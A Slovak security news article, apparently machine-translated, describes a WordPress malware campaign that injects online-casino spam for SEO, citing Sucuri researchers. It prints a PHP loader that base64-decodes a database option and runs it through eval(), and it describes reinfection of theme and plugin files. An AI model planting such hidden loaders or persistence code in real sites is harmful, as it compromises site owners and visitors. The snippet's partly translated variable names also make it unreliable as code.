Kyberzločinci sa čoraz viac zameriavajú na webové stránky, aby vložili škodlivé odkazy a zvýšili svoje hodnotenie optimalizácie pre vyhľadávače prostredníctvom sofistikovanej taktiky blackhat SEO.
Táto kampaň sa primárne zameriava na spam v online kasínach, ktorý sa stal najrozšírenejším typom spamu, ktorý ovplyvňuje napadnuté webové stránky.
Útočníci využívajú zraniteľné miesta v inštaláciách WordPress na vkladanie spamového obsahu propagujúceho online kasína, najmä tie, ktoré sa zameriavajú na medzinárodné trhy, kde sú hazardné hry stále prísne regulované.
Útočníci využívajú viacero techník na udržanie vytrvalosti a vyhýbanie sa detekcii. Zmocňujú sa legitímnych webových stránok vytváraním duplicitných adresárov s identickými názvami, čím efektívne nahrádzajú pôvodný obsah vstupnými stránkami plnými spamu.
Keď sa návštevníci alebo vyhľadávače pokúsia o prístup na stránky, sú presmerovaní na falošné adresáre obsahujúce odkazy na nežiaduce webové stránky kasín.
Táto technika využíva spôsob, akým webové servery Apache a Nginx riešia cesty súborového systému pred odoslaním požiadaviek prepisovacím motorom WordPress.
Bezpečnostní výskumníci Sucuri identifikovali obzvlášť sofistikovaný variant tohto malvéru, ktorý obsahuje viacero vrstiev redundancie.
Škodlivý kód je strategicky zasadený do súborov tém aj doplnkov, aby sa zabezpečilo prežitie, aj keď je objavený jeden komponent.
Táto pokročilá verzia namiesto vytvárania ľahko zistiteľných adresárov spamu ukladá svoje užitočné zaťaženie v databáze WordPress pomocou klamlivých názvov možností.
Viacvrstvový infekčný mechanizmus
Infekcia funguje prostredníctvom šikovnej manipulácie s databázou a dynamického načítavania obsahu.
Výskumníci objavili škodlivý kód vložený v spodnej časti súboru functions.php témy.
Maskovaný obsah (zdroj – Sucuri)
Kód načíta obsah kódovaný v base64 z databázy pomocou názvu voľby wp_footers_logic a vykoná ho pomocou funkcie PHP eval():-
$cloak = get_option(‚wp_footers_logic‘); if ($plášť) { $dekódovaný = base64_decode($plášť); eval($decoded); }
Ak je eval() vypnuté, malvér zapíše obsah do wp-content/cache/style.dat ako záložný mechanizmus. Dekódované užitočné zaťaženie monitoruje prichádzajúce požiadavky na konkrétne cesty URL a kontroluje obsah spamu vo vyrovnávacej pamäti.
Keď sa spustí, načítava obsah z domén kontrolovaných útočníkmi, ako je browsec(.)xyz. Aby sa zabezpečila trvalosť, útočníci umiestnia kód reinfekcie do ďalších súborov doplnkov. Tento kód pravidelne hľadá charakteristické značky.
Ak značky chýbajú, kód automaticky znova pripojí škodlivý obsah k súboru functions.php témy aj k primárnemu súboru prvého aktívneho doplnku, čo demonštruje sofistikované SEO spamové kampane.
Sledujte nás na Google News, LinkedIn a X a získajte viac okamžitých aktualizácií, nastavte CSN ako preferovaný zdroj v Google.
